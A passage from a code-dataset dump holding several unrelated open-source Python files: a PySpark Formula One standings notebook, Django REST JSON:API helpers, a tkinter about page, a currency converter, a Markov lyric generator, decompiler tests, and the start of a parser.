\"../includes/common_functions\"\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 1 - Find race_year values for which the data is to be reprocessed\n\n# COMMAND ----------\n\nrace_results_df = spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n.filter(f\"file_date = '{v_file_date}'\")\n\n# COMMAND ----------\n\nrace_year_list = column_to_list(race_results_df, \"race_year\")\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import col\n\nrace_results_df = spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n.filter(col(\"race_year\").isin(race_year_list))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 2 - Aggregation by sum of points\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import sum, when, count\n\ndriver_standings_df = race_results_df \\\n.groupBy(\"race_year\", \"driver_name\", \"driver_nationality\") \\\n.agg(sum(\"points\"), count(when(col(\"position\") == 1, True))) \\\n.withColumnRenamed(\"sum(points)\", \"total_points\") \\\n.withColumnRenamed(\"count(CASE WHEN (position = 1) THEN true END)\", \"wins\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 3 - Creating a window function for the rank column\n\n# COMMAND ----------\n\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.functions import desc, rank\n\ndriver_rank_spec = Window.partitionBy(\"race_year\").orderBy(desc(\"total_points\"), desc(\"wins\"))\nfinal_df = driver_standings_df.withColumn(\"rank\", rank().over(driver_rank_spec))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 4 - Write data to datalake as Delta\n\n# COMMAND ----------\n\n# overwrite_partition(final_df, \"formula_one_presentation\", \"driver_standings\", \"race_year\")\n\n# COMMAND ----------\n\nmerge_condition = \"tgt.race_year = src.race_year AND tgt.driver_name = src.driver_name\"\nmerge_delta_data(final_df, \"formula_one_presentation\", \"driver_standings\", presentation_folder_path, merge_condition, \"race_year\")\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC SELECT * FROM formula_one_presentation.driver_standings;\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC SELECT race_year, COUNT(1)\n# MAGIC FROM formula_one_presentation.driver_standings\n# MAGIC GROUP BY race_year\n# MAGIC ORDER BY race_year DESC;\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC SELECT *\n# MAGIC FROM formula_one_presentation.driver_standings\n# MAGIC WHERE race_year = 2021;\n\n# COMMAND ----------\n\n\n","repo_name":"dylankjones256/udemy_spark_core_course","sub_path":"driver_standings.py","file_name":"driver_standings.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6261013635","text":"import inspect\nimport operator\n\nimport inflection\nfrom django.conf import settings\nfrom django.db.models import Manager\nfrom django.db.models.fields.related_descriptors import (\n ManyToManyDescriptor,\n ReverseManyToOneDescriptor,\n)\nfrom django.http import Http404\nfrom django.utils import encoding\nfrom django.utils.translation import gettext_lazy as _\nfrom rest_framework import exceptions, relations\nfrom rest_framework.exceptions import APIException\nfrom rest_framework.settings import api_settings\n\nfrom .settings import json_api_settings\n\n# Generic relation descriptor from django.contrib.contenttypes.\nif \"django.contrib.contenttypes\" not in settings.INSTALLED_APPS: # pragma: no cover\n # Target application does not use contenttypes. Importing would cause errors.\n ReverseGenericManyToOneDescriptor = object()\nelse:\n from django.contrib.contenttypes.fields import ReverseGenericManyToOneDescriptor\n\n\ndef get_resource_name(context, expand_polymorphic_types=False):\n \"\"\"\n Return the name of a resource.\n \"\"\"\n from rest_framework_json_api.serializers import PolymorphicModelSerializer\n\n view = context.get(\"view\")\n\n # Sanity check to make sure we have a view.\n if not view:\n return None\n\n # Check to see if there is a status code and return early\n # with the resource_name value of `errors`.\n try:\n code = str(view.response.status_code)\n except (AttributeError, ValueError):\n pass\n else:\n if code.startswith(\"4\") or code.startswith(\"5\"):\n return \"errors\"\n\n try:\n resource_name = view.resource_name\n except AttributeError:\n try:\n if \"kwargs\" in context and \"related_field\" in context[\"kwargs\"]:\n serializer = view.get_related_serializer_class()\n else:\n serializer = view.get_serializer_class()\n if expand_polymorphic_types and issubclass(\n serializer, PolymorphicModelSerializer\n ):\n return serializer.get_polymorphic_types()\n else:\n return get_resource_type_from_serializer(serializer)\n except AttributeError:\n try:\n resource_name = get_resource_type_from_model(view.model)\n except AttributeError:\n resource_name = view.__class__.__name__\n\n if not isinstance(resource_name, str):\n # The resource name is not a string - return as is\n return resource_name\n\n # the name was calculated automatically from the view > pluralize and format\n resource_name = format_resource_type(resource_name)\n\n return resource_name\n\n\ndef get_serializer_fields(serializer):\n fields = None\n if hasattr(serializer, \"child\"):\n fields = serializer.child.fields\n meta = getattr(serializer.child, \"Meta\", None)\n if hasattr(serializer, \"fields\"):\n fields = serializer.fields\n meta = getattr(serializer, \"Meta\", None)\n\n if fields is not None:\n meta_fields = getattr(meta, \"meta_fields\", {})\n for field in meta_fields:\n try:\n fields.pop(field)\n except KeyError:\n pass\n return fields\n\n\ndef format_field_names(obj, format_type=None):\n \"\"\"\n Takes a dict and returns it with formatted keys as set in `format_type`\n or `JSON_API_FORMAT_FIELD_NAMES`\n\n :format_type: Either 'dasherize', 'camelize', 'capitalize' or 'underscore'\n \"\"\"\n if format_type is None:\n format_type = json_api_settings.FORMAT_FIELD_NAMES\n\n if isinstance(obj, dict):\n return {format_value(key, format_type): value for key, value in obj.items()}\n\n return obj\n\n\ndef undo_format_field_names(obj):\n \"\"\"\n Takes a dict and undo format field names to underscore which is the Python convention\n but only in case `JSON_API_FORMAT_FIELD_NAMES` is actually configured.\n \"\"\"\n if json_api_settings.FORMAT_FIELD_NAMES:\n return format_field_names(obj, \"underscore\")\n\n return obj\n\n\ndef format_field_name(field_name):\n \"\"\"\n Takes a field name and returns it with formatted keys as set in\n `JSON_API_FORMAT_FIELD_NAMES`\n \"\"\"\n return format_value(field_name, json_api_settings.FORMAT_FIELD_NAMES)\n\n\ndef undo_format_field_name(field_name):\n \"\"\"\n Takes a string and undos format field name to underscore which is the Python convention\n but only in case `JSON_API_FORMAT_FIELD_NAMES` is actually configured.\n \"\"\"\n if json_api_settings.FORMAT_FIELD_NAMES:\n return format_value(field_name, \"underscore\")\n\n return field_name\n\n\ndef format_link_segment(value):\n \"\"\"\n Takes a string value and returns it with formatted keys as set in `format_type`\n or `JSON_API_FORMAT_RELATED_LINKS`.\n\n :format_type: Either 'dasherize', 'camelize', 'capitalize' or 'underscore'\n \"\"\"\n format_type = json_api_settings.FORMAT_RELATED_LINKS\n return format_value(value, format_type)\n\n\ndef undo_format_link_segment(value):\n \"\"\"\n Takes a link segment and undos format link segment to underscore which is the Python\n convention but only in case `JSON_API_FORMAT_RELATED_LINKS` is actually configured.\n \"\"\"\n\n if json_api_settings.FORMAT_RELATED_LINKS:\n return format_value(value, \"underscore\")\n\n return value\n\n\ndef format_value(value, format_type):\n if format_type == \"dasherize\":\n # inflection can't dasherize camelCase\n value = inflection.underscore(value)\n value = inflection.dasherize(value)\n elif format_type == \"camelize\":\n value = inflection.camelize(value, False)\n elif format_type == \"capitalize\":\n value = inflection.camelize(value)\n elif format_type == \"underscore\":\n value = inflection.underscore(value)\n return value\n\n\ndef format_resource_type(value, format_type=None, pluralize=None):\n if format_type is None:\n format_type = json_api_settings.FORMAT_TYPES\n\n if pluralize is None:\n pluralize = json_api_settings.PLURALIZE_TYPES\n\n if format_type:\n value = format_value(value, format_type)\n\n return inflection.pluralize(value) if pluralize else value\n\n\ndef get_related_resource_type(relation):\n from rest_framework_json_api.serializers import PolymorphicModelSerializer\n\n try:\n return get_resource_type_from_serializer(relation)\n except AttributeError:\n pass\n relation_model = None\n if hasattr(relation, \"_meta\"):\n relation_model = relation._meta.model\n elif hasattr(relation, \"model\"):\n # the model type was explicitly passed as a kwarg to ResourceRelatedField\n relation_model = relation.model\n elif hasattr(relation, \"get_queryset\") and relation.get_queryset() is not None:\n relation_model = relation.get_queryset().model\n elif hasattr(relation, \"child_relation\"):\n # For ManyRelatedField relationships, get the model from the child relationship\n try:\n return get_related_resource_type(relation.child_relation)\n except AttributeError:\n # Some read only relationships fail to get it directly, fall through to\n # get via the parent\n pass\n if not relation_model:\n parent_serializer = relation.parent\n parent_model = None\n if isinstance(parent_serializer, PolymorphicModelSerializer):\n parent_model = parent_serializer.get_polymorphic_serializer_for_instance(\n parent_serializer.instance\n ).Meta.model\n elif hasattr(parent_serializer, \"Meta\"):\n parent_model = getattr(parent_serializer.Meta, \"model\", None)\n elif hasattr(parent_serializer, \"parent\") and hasattr(\n parent_serializer.parent, \"Meta\"\n ):\n parent_model = getattr(parent_serializer.parent.Meta, \"model\", None)\n\n if parent_model is not None:\n if relation.source:\n if relation.source != \"*\":\n parent_model_relation = getattr(parent_model, relation.source)\n else:\n parent_model_relation = getattr(parent_model, relation.field_name)\n else:\n parent_model_relation = getattr(\n parent_model, parent_serializer.field_name\n )\n\n parent_model_relation_type = type(parent_model_relation)\n if parent_model_relation_type is ReverseManyToOneDescriptor:\n relation_model = parent_model_relation.rel.related_model\n elif parent_model_relation_type is ManyToManyDescriptor:\n relation_model = parent_model_relation.field.remote_field.model\n # In case we are in a reverse relation\n if relation_model == parent_model:\n relation_model = parent_model_relation.field.model\n elif parent_model_relation_type is ReverseGenericManyToOneDescriptor:\n relation_model = parent_model_relation.rel.model\n elif hasattr(parent_model_relation, \"field\"):\n try:\n relation_model = parent_model_relation.field.remote_field.model\n except AttributeError:\n relation_model = parent_model_relation.field.related.model\n else:\n return get_related_resource_type(parent_model_relation)\n\n if relation_model is None:\n # For ManyRelatedFields on plain Serializers the resource_type\n # cannot be determined from a model, so we must get it from the\n # child_relation\n if hasattr(relation, \"child_relation\"):\n return get_related_resource_type(relation.child_relation)\n raise APIException(\n _(f\"Could not resolve resource type for relation {relation}\")\n )\n\n return get_resource_type_from_model(relation_model)\n\n\ndef get_resource_type_from_model(model):\n json_api_meta = getattr(model, \"JSONAPIMeta\", None)\n return getattr(json_api_meta, \"resource_name\", format_resource_type(model.__name__))\n\n\ndef get_resource_type_from_queryset(qs):\n return get_resource_type_from_model(qs.model)\n\n\ndef get_resource_type_from_instance(instance):\n if hasattr(instance, \"_meta\"):\n return get_resource_type_from_model(instance._meta.model)\n\n\ndef get_resource_type_from_manager(manager):\n return get_resource_type_from_model(manager.model)\n\n\ndef get_resource_type_from_serializer(serializer):\n json_api_meta = getattr(serializer, \"JSONAPIMeta\", None)\n meta = getattr(serializer, \"Meta\", None)\n if hasattr(json_api_meta, \"resource_name\"):\n return json_api_meta.resource_name\n elif hasattr(meta, \"resource_name\"):\n return meta.resource_name\n elif hasattr(meta, \"model\"):\n return get_resource_type_from_model(meta.model)\n raise AttributeError(\n f\"can not detect 'resource_name' on serializer {serializer.__class__.__name__!r}\"\n f\" in module {serializer.__class__.__module__!r}\"\n )\n\n\ndef get_resource_id(resource_instance, resource):\n \"\"\"Returns the resource identifier for a given instance (`id` takes priority over `pk`).\"\"\"\n if resource and \"id\" in resource:\n return resource[\"id\"] and encoding.force_str(resource[\"id\"]) or None\n if resource_instance:\n return (\n hasattr(resource_instance, \"pk\")\n and encoding.force_str(resource_instance.pk)\n or None\n )\n return None\n\n\ndef get_included_resources(request, serializer=None):\n \"\"\"Build a list of included resources.\"\"\"\n include_resources_param = request.query_params.get(\"include\") if request else None\n if include_resources_param:\n return include_resources_param.split(\",\")\n else:\n return get_default_included_resources_from_serializer(serializer)\n\n\ndef get_default_included_resources_from_serializer(serializer):\n meta = getattr(serializer, \"JSONAPIMeta\", None)\n if meta is None and getattr(serializer, \"many\", False):\n meta = getattr(serializer.child, \"JSONAPIMeta\", None)\n return list(getattr(meta, \"included_resources\", []))\n\n\ndef get_relation_instance(resource_instance, source, serializer):\n try:\n relation_instance = operator.attrgetter(source)(resource_instance)\n except AttributeError:\n # if the field is not defined on the model then we check the serializer\n # and if no value is there we skip over the field completely\n serializer_method = getattr(serializer, source, None)\n if serializer_method and callable(serializer_method):\n relation_instance = serializer_method(resource_instance)\n else:\n return False, None\n\n if isinstance(relation_instance, Manager):\n relation_instance = relation_instance.all()\n\n return True, relation_instance\n\n\ndef is_relationship_field(field):\n return isinstance(field, (relations.RelatedField, relations.ManyRelatedField))\n\n\nclass Hyperlink(str):\n \"\"\"\n A string like object that additionally has an associated name.\n We use this for hyperlinked URLs that may render as a named link\n in some contexts, or render as a plain URL in others.\n\n Comes from Django REST framework 3.2\n https://github.com/tomchristie/django-rest-framework\n \"\"\"\n\n def __new__(cls, url, name):\n ret = str.__new__(cls, url)\n ret.name = name\n return ret\n\n is_hyperlink = True\n\n\ndef format_drf_errors(response, context, exc):\n errors = []\n # handle generic errors. ValidationError('test') in a view for example\n if isinstance(response.data, list):\n for message in response.data:\n errors.extend(format_error_object(message, \"/data\", response))\n # handle all errors thrown from serializers\n else:\n # Avoid circular deps\n from rest_framework import generics\n\n has_serializer = isinstance(context[\"view\"], generics.GenericAPIView)\n if has_serializer:\n serializer = context[\"view\"].get_serializer()\n fields = get_serializer_fields(serializer) or dict()\n relationship_fields = [\n format_field_name(name)\n for name, field in fields.items()\n if is_relationship_field(field)\n ]\n\n for field, error in response.data.items():\n non_field_error = field == api_settings.NON_FIELD_ERRORS_KEY\n field = format_field_name(field)\n pointer = None\n if non_field_error:\n # Serializer error does not refer to a specific field.\n pointer = \"/data\"\n elif has_serializer:\n # pointer can be determined only if there's a serializer.\n rel = \"relationships\" if field in relationship_fields else \"attributes\"\n pointer = f\"/data/{rel}/{field}\"\n if isinstance(exc, Http404) and isinstance(error, str):\n # 404 errors don't have a pointer\n errors.extend(format_error_object(error, None, response))\n elif isinstance(error, str):\n classes = inspect.getmembers(exceptions, inspect.isclass)\n # DRF sets the `field` to 'detail' for its own exceptions\n if isinstance(exc, tuple(x[1] for x in classes)):\n pointer = \"/data\"\n errors.extend(format_error_object(error, pointer, response))\n elif isinstance(error, list):\n errors.extend(format_error_object(error, pointer, response))\n else:\n errors.extend(format_error_object(error, pointer, response))\n\n context[\"view\"].resource_name = \"errors\"\n response.data = errors\n\n return response\n\n\ndef format_error_object(message, pointer, response):\n errors = []\n if isinstance(message, dict):\n # as there is no required field in error object we check that all fields are string\n # except links, source or meta which might be a dict\n is_custom_error = all(\n [\n isinstance(value, str)\n for key, value in message.items()\n if key not in [\"links\", \"source\", \"meta\"]\n ]\n )\n\n if is_custom_error:\n if \"source\" not in message:\n message[\"source\"] = {}\n if \"pointer\" not in message[\"source\"]:\n message[\"source\"][\"pointer\"] = pointer\n errors.append(message)\n else:\n for k, v in message.items():\n errors.extend(format_error_object(v, pointer + f\"/{k}\", response))\n elif isinstance(message, list):\n for num, error in enumerate(message):\n if isinstance(error, (list, dict)):\n new_pointer = pointer + f\"/{num}\"\n else:\n new_pointer = pointer\n if error:\n errors.extend(format_error_object(error, new_pointer, response))\n else:\n error_obj = {\n \"detail\": message,\n \"status\": encoding.force_str(response.status_code),\n }\n if pointer is not None:\n error_obj[\"source\"] = {\n \"pointer\": pointer,\n }\n code = getattr(message, \"code\", None)\n if code is not None:\n error_obj[\"code\"] = code\n errors.append(error_obj)\n\n return errors\n\n\ndef format_errors(data):\n if len(data) > 1 and isinstance(data, list):\n data.sort(key=lambda x: x.get(\"source\", {}).get(\"pointer\", \"\"))\n return {\"errors\": data}\n","repo_name":"django-json-api/django-rest-framework-json-api","sub_path":"rest_framework_json_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":17436,"program_lang":"python","lang":"en","doc_type":"code","stars":1116,"dataset":"github-code","pt":"37"} +{"seq_id":"13206402557","text":"import tkinter as tk\r\n\r\n\r\nclass AboutUsPage(tk.Frame):\r\n def __init__(self, parent, controller):\r\n tk.Frame.__init__(self, parent)\r\n self.controller = controller\r\n l1 = tk.Label(self, text=\"About Vibr.IO\", font=(None, 28), pady=20)\r\n l1.pack()\r\n\r\n l2 = tk.Label(self,\r\n text=\"Vibr.IO is developed by Charosa Research Incubator, a student group at the University of Minnesota - Twin Cities.\",\r\n font=(None, 14), pady=10)\r\n l2.pack()\r\n\r\n t1 = tk.Label(self, text=\"Contributors\", font=(None, 20), pady=0)\r\n t1.pack()\r\n\r\n l3 = tk.Label(self, text=\"David Wang\\n Alessandro Snyder\\n Gaurav Behera\", font=(None, 14), pady=10)\r\n l3.pack()\r\n\r\n t2 = tk.Label(self, text=\"Model Approximations\", font=(None, 20), pady=0)\r\n t2.pack()\r\n\r\n l4 = tk.Label(self,\r\n text=\"The model represents cell growth in culture as a batch process described by Monod growth kinetics. For the model, NaCl was considered the limiting substrate for cell growth. The growth constants umax, Ks, and Yxs were fit from experimental data of Vibrio fischeri growth in medium containing yeast extract, tryptone, and NaCl (Castillo-Gomez et al. 2019). The fit values were: umax = 0.43 hr\\u207b\\u00b9, Ks = 1.2 g/L, Yxs = 1.21. Peak cell density was approximated as the point where the cell population grew by less than 0.01% versus the previous timestep.\\n Cell death was approximated by first-order kinetics, with a death constant of Kd = 0.43 hr\\u207b\\u00b9. This value from the literature describes the death rate of E. coli in culture, and was used as a first approximation to estimate the death rate of V. fischeri (Schink et al. 2019).\",\r\n font=(None, 14), wraplength=1000, pady=10)\r\n l4.pack()\r\n\r\n t3 = tk.Label(self, text=\"Acknowledgements\", font=(None, 20), pady=0)\r\n t3.pack()\r\n\r\n l5 = tk.Label(self, text=\"Thank you to Y. Luna Lin, for the Vibrio fischeri modeling advice.\", font=(None, 14),\r\n pady=10)\r\n l5.pack()\r\n\r\n btn1 = tk.Button(self, text='Back', command=lambda: controller.show_frame(\"StartPage\"))\r\n btn1.config(height=3, width=20)\r\n btn1.pack(pady=30)","repo_name":"charosa-umn/Vibr.IO","sub_path":"about_us_page.py","file_name":"about_us_page.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72162084266","text":"from typing import List, Optional\n\nimport uuid\n\nfrom pydantic import BaseModel, Field\n\nmake_uuid = lambda: str(uuid.uuid4())\n\n\nclass PersonModel(BaseModel):\n id: str = Field(default_factory=make_uuid)\n imie: str\n nazwisko: str\n wiek: int\n o_mnie: str\n ulubiona_postac_z_kapitana_bomby: str\n ulubiony_serial: str\n ulubiony_film: str\n ulubiony_kolor: str\n vector: Optional[List[float]] = None\n","repo_name":"Pankejk/ai-devs-2","sub_path":"ai_devs_2/tasks/tasks_3/tasks_5_2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8876102359","text":"import requests\nimport json\n\nwhile True:\n adres = \"https://api.exchangeratesapi.io/latest?base=\"\n\n\n print(\"dolar = USD \\ntürk lirası =TRY\\neuro = EUR\\nrus rublesi = RUB\\ndegerlerini giriniz..\")\n\n\n bozulanDovız = input(\"lutfen bozdurmak istedgınız dovız kurunu gırınız : \")\n bozulanKur = input(\"lutfen bozdurulacak dovız kurunu gırınız : \")\n mıktar = int(input(f\"Ne kadar { bozulanDovız } bozdurmak istiyorsunuz : \"))\n\n\n\n result = requests.get(adres + bozulanDovız)\n result = json.loads(result.text)\n\n print(\"1 {0} = {1} {2}\".format(bozulanDovız, result[\"rates\"][bozulanKur], bozulanKur))\n print(\"{0} {1} = {2} {3}\".format(mıktar, bozulanKur, mıktar * result[\"rates\"][bozulanKur],bozulanKur))","repo_name":"hayrullahgozel/Python","sub_path":"api ile dovız cevirme.py","file_name":"api ile dovız cevirme.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70019486828","text":"\"\"\"\nEmpty Compose Template to implement :D\n\nYouTube Kylie Ying: https://www.youtube.com/ycubed \nTwitch KylieYing: https://www.twitch.tv/kylieying \nTwitter @kylieyying: https://twitter.com/kylieyying \nInstagram @kylieyying: https://www.instagram.com/kylieyying/ \nWebsite: https://www.kylieying.com\nGithub: https://www.github.com/kying18 \nProgrammer Beast Mode Spotify playlist: https://open.spotify.com/playlist/4Akns5EUb3gzmlXIdsJkPs?si=qGc4ubKRRYmPHAJAIrCxVQ \n\"\"\"\n\n# What do we need to do here?\nimport os\nimport re\nimport string\nimport random\n\nfrom graph_template import Graph, Vertex\n\n\ndef get_words_from_text(text_path):\n with open(text_path, 'r') as f:\n text = f.read()\n \n # remove [text in here]\n text = re.sub(r'\\[(.+)\\]', ' ', text)\n\n text = ' '.join(text.split())\n text = text.lower() # make everything lowercase\n '''\n Now we could be complex and deal with punctuation; but there are cases where \n you might add a period such as (Mr. Brightside), but that's is not really \n punctuation, so we just remove all the punctuation\n '''\n # hello! it's me. -> hello its me\n text = text.translate(str.maketrans('', '', string.punctuation))\n\n words = text.split() # split on spaces again\n return words\n\n\ndef make_graph(words):\n g = Graph()\n\n previous_word = None\n\n # for each word\n for word in words:\n # check that word is in the graph, and if not then add it\n word_vertex = g.get_vertex(word)\n # if there was a previous word, then add an edge if it does not already\n if previous_word:\n previous_word.increment_edge(word_vertex)\n # set our word to the previous word and iterate\n previous_word = word_vertex\n\n # now remember that we want to generate the probability mappings before composing\n # this is a great place to do it before we return the graph object\n g.generate_probability_mappings()\n\n return g\n\n\ndef compose(g, words, length=50):\n composition = []\n word = g.get_vertex(random.choice(words)) # pick a random word\n for _ in range(length):\n composition.append(word.value)\n word = g.get_next_word(word)\n\n return composition\n\n\ndef main(artist):\n # Step 1: get words from text\n # words = get_words_from_text('texts/hp_sorcerer_stone.txt')\n words = []\n for song_file in os.listdir(f'songs/{artist}'):\n if song_file == '.DS_Store':\n continue\n song_words = get_words_from_text(f'songs/{artist}/{song_file}')\n words.extend(song_words)\n # Step 2: make a graph using those words\n g = make_graph(words)\n # Step 3: get the next word for x number of words (defined by user)\n # Step 4: show the user\n composition = compose(g, words, 100)\n return ' '.join(composition)\n\n\nif __name__ == '__main__':\n print(main('taylor_swift'))\n","repo_name":"aaronsaldanha/12-Beginner-Python-Projects","sub_path":"Graph Composer/compose_template.py","file_name":"compose_template.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11109749236","text":"from uncompyle6.semantics.fragments import code_deparse as deparse\nfrom xdis.version_info import PYTHON_VERSION_TRIPLE\n\ndef map_stmts(x, y):\n x = []\n y = {}\n return x, y\n\ndef return_stmt(x, y):\n return x, y\n\ndef try_stmt():\n try:\n x = 1\n except:\n pass\n return x\n\ndef for_range_stmt():\n for i in range(2):\n i+1\n\n# # FIXME: add this test - but for Python 2.7+ only\n# def set_comp():\n# {y for y in range(3)}\n\n# FIXME: add this test\ndef list_comp():\n [y for y in range(3)]\n\ndef get_parsed_for_fn(fn):\n code = fn.__code__\n return deparse(code, version=PYTHON_VERSION_TRIPLE)\n\ndef check_expect(expect, parsed, fn_name):\n debug = False\n i = 2\n max_expect = len(expect)\n for name, offset in sorted(parsed.offsets.keys()):\n assert i+1 <= max_expect, (\n \"%s: ran out if items in testing node\" % fn_name)\n nodeInfo = parsed.offsets[name, offset]\n node = nodeInfo.node\n extractInfo = parsed.extract_node_info(node)\n\n assert expect[i] == extractInfo.selectedLine, \\\n ('%s: line %s expect:\\n%s\\ngot:\\n%s' %\n (fn_name, i, expect[i], extractInfo.selectedLine))\n assert expect[i+1] == extractInfo.markerLine, \\\n ('line %s expect:\\n%s\\ngot:\\n%s' %\n (i+1, expect[i+1], extractInfo.markerLine))\n i += 3\n if debug:\n print(node.offset)\n print(extractInfo.selectedLine)\n print(extractInfo.markerLine)\n\n extractInfo, p = parsed.extract_parent_info(node)\n if extractInfo:\n assert i+1 < max_expect, \"ran out of items in testing parent\"\n if debug:\n print(\"Contained in...\")\n print(extractInfo.selectedLine)\n print(extractInfo.markerLine)\n assert expect[i] == extractInfo.selectedLine, \\\n (\"parent line %s expect:\\n%s\\ngot:\\n%s\" %\n (i, expect[i], extractInfo.selectedLine))\n assert expect[i+1] == extractInfo.markerLine, \\\n (\"parent line %s expect:\\n%s\\ngot:\\n%s\" %\n (i+1, expect[i+1], extractInfo.markerLine))\n i += 3\n pass\n pass\n\n\ndef test_stuff():\n return\n parsed = get_parsed_for_fn(map_stmts)\n expect = \"\"\"\n-1\nreturn (x, y)\n ^\nContained in...\nreturn (x, y)\n-------------\n0\nx = []\n -\nContained in...\nx = []\n --\n3\nx = []\n-\nContained in...\nx = []\n------\n6\ny = {}\n -\nContained in...\ny = {}\n --\n9\ny = {}\n-\nContained in...\ny = {}\n------\n12\nreturn (x, y)\n -\nContained in...\nreturn (x, y)\n ------\n15\nreturn (x, y)\n -\nContained in...\nreturn (x, y)\n ------\n18\nreturn (x, y)\n ------\nContained in...\nreturn (x, y)\n-------------\n21\nreturn (x, y)\n-------------\nContained in...\nx = [] ...\n------ ...\n\"\"\".split(\"\\n\")\n check_expect(expect, parsed, 'map_stmts')\n ########################################################\n # return\n\n parsed = get_parsed_for_fn(return_stmt)\n expect = \"\"\"\n-1\nreturn (x, y)\n ^\nContained in...\nreturn (x, y)\n-------------\n0\nreturn (x, y)\n -\nContained in...\nreturn (x, y)\n ------\n3\nreturn (x, y)\n -\nContained in...\nreturn (x, y)\n ------\n6\nreturn (x, y)\n ------\nContained in...\nreturn (x, y)\n-------------\n9\nreturn (x, y)\n-------------\nContained in...\nreturn (x, y)\n-------------\n\"\"\".split(\"\\n\")\n check_expect(expect, parsed, 'return_stmt')\n ########################################################\n# # try\n\n# expect = \"\"\"\n# -1\n# return (x, y)\n# ^\n# Contained in...\n# return (x, y)\n# -------------\n# 0\n# try:\n# ----\n# Contained in...\n# try: ...\n# ---- ...\n# 3\n# x = 1\n# -\n# Contained in...\n# x = 1\n# -----\n# 6\n# x = 1\n# -\n# Contained in...\n# x = 1\n# -----\n# 9\n# pass\n# ^\n# Contained in...\n# try: ...\n# ---- ...\n# 10\n# except:\n# ^\n# Contained in...\n# except: ...\n# ------- ...\n# 19\n# pass\n# ^\n# Contained in...\n# except: ...\n# ------- ...\n# 13_0\n# except:\n# ^\n# Contained in...\n# except: ...\n# ------- ...\n# 20_0\n# pass\n# ^\n# Contained in...\n# except: ...\n# ------- ...\n# \"\"\".split(\"\\n\")\n# parsed = get_parsed_for_fn(try_stmt)\n# check_expect(expect, parsed)\n\n# ########################################################\n# # for range\n expect = \"\"\"\n0\nfor i in range(2):\n -\nContained in...\nfor i in range(2): ...\n------------------ ...\n3\nfor i in range(2):\n -----\nContained in...\nfor i in range(2):\n --------\n6\nfor i in range(2):\n -\nContained in...\nfor i in range(2):\n --------\n9\nfor i in range(2):\n --------\nContained in...\nfor i in range(2): ...\n------------------ ...\n12\nfor i in range(2):\n -\nContained in...\nfor i in range(2): ...\n------------------ ...\n13\nfor i in range(2):\n -\nContained in...\nfor i in range(2): ...\n------------------ ...\n16\nfor i in range(2):\n -\nContained in...\nfor i in range(2): ...\n------------------ ...\n19\n i + 1\n -\nContained in...\n i + 1\n -----\n22\n i + 1\n -\nContained in...\n i + 1\n -----\n25\n i + 1\n -\nContained in...\n i + 1\n -----\n27\nreturn\n ^\nContained in...\n i + 1\n -----\n31\nreturn\n------\nContained in...\nfor i in range(2): ...\n------------------ ...\n34\nreturn\n------\nContained in...\nfor i in range(2): ...\n------------------ ...\n.\n\"\"\".split(\"\\n\")\n parsed = get_parsed_for_fn(for_range_stmt)\n","repo_name":"rocky/python-uncompyle6","sub_path":"pytest/test_deparse.py","file_name":"test_deparse.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","stars":3383,"dataset":"github-code","pt":"37"} +{"seq_id":"25595950846","text":"from scanner import *\nfrom objeto import *\nimport pandas as pd\n\nPRINT_PILHA = False\nGET_ON_TABLE = False\nREDUCTION_GRAM = True\nREDUCE = False\nSHIFT = False\nTOKEN = False\nFULL_PILHA = False\nLEXEMA = False\ngram = [\n [\"P'\", \"P\"], #1\n [\"P\",\"inicio\",\"V\",\"A\"], #2\n [\"V\",\"varinicio\",\"LV\"], #3\n [\"LV\",\"D\",\"LV\"], #4\n [\"LV\",\"varfim\",\"PT_V\"], #5\n [\"D\",\"TIPO\",\"L\",\"PT_V\"], #6\n [\"L\",\"ID\",\"VIR\",\"L\"], #7\n [\"L\",\"ID\"], #8\n [\"TIPO\",\"inteiro\"], #9\n [\"TIPO\",\"real\"], #10\n [\"TIPO\",\"literal\"], #11\n [\"A\",\"ES\",\"A\"], #12\n [\"ES\",\"leia\",\"ID\",\"PT_V\"], #13\n [\"ES\",\"escreva\",\"ARG\",\"PT_V\"],#14\n [\"ARG\",\"LIT\"], #15\n [\"ARG\",\"NUM\"], #16\n [\"ARG\",\"ID\"], #17\n [\"A\",\"CMD\",\"A\"], #18\n [\"CMD\",\"ID\",\"ATR\",\"LD\",\"PT_V\"],#19\n [\"LD\",\"OPRD\",\"OPA\",\"OPRD\"],#20\n [\"LD\",\"OPRD\"], #21\n [\"OPRD\",\"ID\"], #22\n [\"OPRD\",\"NUM\"], #23\n [\"A\",\"COND\",\"A\"], #24\n [\"COND\",\"CAB\",\"CP\"], #25\n [\"CAB\",\"se\",\"AB_P\", \"EXP_R\",\"FC_P\",\"entao\"],#26\n [\"EXP_R\",\"OPRD\",\"OPR\",\"OPRD\"],#27\n [\"CP\",\"ES\",\"CP\"], #28\n [\"CP\",\"CMD\",\"CP\"], #29\n [\"CP\",\"COND\",\"CP\"], #30\n [\"CP\",\"fimse\"], #31\n [\"A\",\"fim\"] #32\n]\npilha = [0]\n\ndef main():\n\n iniciaObj()\n global pilha, gram\n Tabela = 